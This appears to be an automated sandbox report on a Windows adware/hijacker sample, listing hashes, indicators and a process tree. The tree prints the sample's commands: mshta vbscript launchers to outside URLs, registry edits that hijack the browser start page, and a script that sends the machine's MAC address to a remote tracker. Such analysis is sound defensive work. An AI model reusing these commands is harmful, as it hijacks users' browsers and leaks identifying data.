Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
2s -
max time network
141s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
02/01/2024, 15:38
Static task
static1
Behavioral task
behavioral1
Sample
7e68b17d4fa5b2e59f1b6309a6581519.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
7e68b17d4fa5b2e59f1b6309a6581519.exe
Resource
win10v2004-20231215-en
General
-
Target
7e68b17d4fa5b2e59f1b6309a6581519.exe
-
Size
44KB
-
MD5
7e68b17d4fa5b2e59f1b6309a6581519
-
SHA1
5d66be6c523ef8eda99d09b0989c8d31732debb9
-
SHA256
c2573e2c825fcf6c63ccf3db067dce07000c4fdfa507f93365701377b755ad9c
-
SHA512
d2a125aacc5476fb80bc4c0d189aec5ccadc30c61a39b2a7082c0f786a2de932efd8dc11f394433037043e48c147111e11d5b2f7862c4aeac14217cb0a724a4d
-
SSDEEP
384:GjiXAA8k9OgEZ6Q/SD/Vc28bkBp1NlEcFh19hJlS5J0f6VA72Y9FSPlHBPXxtpJZ:V9OggI/VEYNlnUXxth
Malware Config
Extracted
http://adminlzcheng.6600.org/img/tc.htm?34",0)(window.close)
Extracted
http://www.27dh.com/?34tc",0)(window.close)
Signatures
-
Drops file in Windows directory 2 IoCs
description ioc Process File opened for modification C:\WINDOWS\46.bat 7e68b17d4fa5b2e59f1b6309a6581519.exe File opened for modification C:\WINDOWS\46.vbs 7e68b17d4fa5b2e59f1b6309a6581519.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates processes with tasklist 1 TTPs 1 IoCs
pid Process 1556 tasklist.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 2836 ipconfig.exe -
Runs regedit.exe 2 IoCs
pid Process 336 regedit.exe 1764 regedit.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
pid Process 2240 7e68b17d4fa5b2e59f1b6309a6581519.exe 2240 7e68b17d4fa5b2e59f1b6309a6581519.exe 2240 7e68b17d4fa5b2e59f1b6309a6581519.exe 2240 7e68b17d4fa5b2e59f1b6309a6581519.exe 2240 7e68b17d4fa5b2e59f1b6309a6581519.exe 2240 7e68b17d4fa5b2e59f1b6309a6581519.exe 2240 7e68b17d4fa5b2e59f1b6309a6581519.exe 2240 7e68b17d4fa5b2e59f1b6309a6581519.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2240 7e68b17d4fa5b2e59f1b6309a6581519.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2240 wrote to memory of 2924 2240 7e68b17d4fa5b2e59f1b6309a6581519.exe 22 PID 2240 wrote to memory of 2924 2240 7e68b17d4fa5b2e59f1b6309a6581519.exe 22 PID 2240 wrote to memory of 2924 2240 7e68b17d4fa5b2e59f1b6309a6581519.exe 22 PID 2240 wrote to memory of 2924 2240 7e68b17d4fa5b2e59f1b6309a6581519.exe 22 PID 2240 wrote to memory of 2676 2240 7e68b17d4fa5b2e59f1b6309a6581519.exe 17 PID 2240 wrote to memory of 2676 2240 7e68b17d4fa5b2e59f1b6309a6581519.exe 17 PID 2240 wrote to memory of 2676 2240 7e68b17d4fa5b2e59f1b6309a6581519.exe 17 PID 2240 wrote to memory of 2676 2240 7e68b17d4fa5b2e59f1b6309a6581519.exe 17 PID 2924 wrote to memory of 2844 2924 cmd.exe 19 PID 2924 wrote to memory of 2844 2924 cmd.exe 19 PID 2924 wrote to memory of 2844 2924 cmd.exe 19 PID 2924 wrote to memory of 2844 2924 cmd.exe 19 -
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 2384 attrib.exe 2536 attrib.exe 1884 attrib.exe 1728 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\7e68b17d4fa5b2e59f1b6309a6581519.exe"C:\Users\Admin\AppData\Local\Temp\7e68b17d4fa5b2e59f1b6309a6581519.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2240 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\WINDOWS\46.vbs"2⤵PID:2676
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\WINDOWS\46.vbs"3⤵PID:3020
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\WINDOWS\46.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2924 -
C:\Windows\SysWOW64\mshta.exemshta vbscript:CreateObject("WScript.Shell").Run("iexplore http://www.27dh.com/?34tc",0)(window.close)3⤵PID:2972
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.27dh.com/?34tc4⤵PID:1992
-
-
-
C:\Windows\SysWOW64\regedit.exeRegedit /s add7.rig3⤵
- Runs regedit.exe
PID:336
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /f3⤵PID:476
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{86AEFBE8-763F-0647-899C-A93138888899}" /f3⤵PID:2368
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_CLASSES_ROOT\CLSID\{86AEFBE8-763F-0647-899C-A93138888899}" /f3⤵PID:2196
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r "C:\Users\Admin\í╕┐¬╩╝í╣▓╦╡Ñ\│╠╨≥\╞⌠╢»\*.lnk"3⤵
- Views/modifies file attributes
PID:1728
-
-
C:\Windows\SysWOW64\reg.exereg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\{86AEFBE8-763F-0647-899C-A93138888899}" /f3⤵PID:2452
-
-
C:\Windows\SysWOW64\regedit.exeRegedit /s web.rig3⤵
- Runs regedit.exe
PID:1764
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r "C:\Users\Admin\í╕┐¬╩╝í╣▓╦╡Ñ\│╠╨≥\*.lnk"3⤵
- Views/modifies file attributes
PID:2384
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r "C:\Users\Admin\╫└├µ\*.lnk"3⤵
- Views/modifies file attributes
PID:2536
-
-
C:\Windows\SysWOW64\attrib.exeattrib -r "C:\Users\Admin\Application Data\Microsoft\Internet Explorer\Quick Launch\*.lnk"3⤵
- Views/modifies file attributes
PID:1884
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /all|findstr /c:"Physical Address"3⤵PID:1116
-
C:\Windows\SysWOW64\findstr.exefindstr /c:"Physical Address"4⤵PID:1860
-
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all4⤵
- Gathers network information
PID:2836
-
-
-
C:\Windows\SysWOW64\tasklist.exetasklist /nh3⤵
- Enumerates processes with tasklist
PID:1556
-
-
C:\Windows\SysWOW64\regini.exeregini C:\Windows\system32\regsets.ini3⤵PID:688
-
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.27dh.com/?10034/" /f3⤵PID:760
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Windows\help\rllfdDSDfds7.vbs"3⤵PID:596
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.fx0099.cn/tj/tj.asp?mac= 00:00:00:00:00:00:00:E0&ver=370426&userid=344⤵PID:1312
-
-
-
-
C:\Windows\SysWOW64\mshta.exemshta vbscript:CreateObject("WScript.Shell").Run("iexplore http://adminlzcheng.6600.org/img/tc.htm?34",0)(window.close)1⤵PID:2844
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://adminlzcheng.6600.org/img/tc.htm?342⤵PID:2780
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2780 CREDAT:275457 /prefetch:23⤵PID:2584
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2780 CREDAT:209930 /prefetch:23⤵PID:1908
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2780 CREDAT:668691 /prefetch:23⤵PID:552
-
-